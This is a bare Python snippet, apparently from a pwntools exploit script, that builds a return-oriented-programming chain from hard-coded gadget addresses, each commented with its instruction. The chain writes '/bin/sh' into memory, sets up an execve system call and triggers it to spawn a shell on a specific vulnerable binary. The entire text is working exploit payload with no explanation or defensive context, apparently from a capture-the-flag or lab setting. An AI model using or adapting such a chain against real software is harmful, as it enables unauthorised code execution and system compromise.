payload = p64(0x40c79d)
#0x000000000040c79d: pop rsi; ret; 
payload += p64(0x45c070)+p64(0x409595)
# 0x0000000000409595: pop rdx; ret; 
payload += p64(0x68662f6e69622f)+p64(0x43f04d)
# 0x000000000043f04d: mov qword ptr [rsi], rdx; ret; 
payload += p64(0x42dbba)
# 0x000000000042dbba: pop rdi; ret; 
payload += p64(0x33)+p64(0x4156f3)
# 0x00000000004156f3: lea rax, [rdi + 8]; ret; 
payload += p64(0x40c79d)
# 0x000000000040c79d: pop rsi; ret; 
payload += p64(0x0)+p64(0x409595)
# 0x0000000000409595: pop rdx; ret; 
payload += p64(0x0)+p64(0x42dbba)
# 0x000000000042dbba: pop rdi; ret; 
payload += p64(0x45c070)+p64(0x40ac9a)
# 0x000000000040ac9a: syscall; 
payload += b''
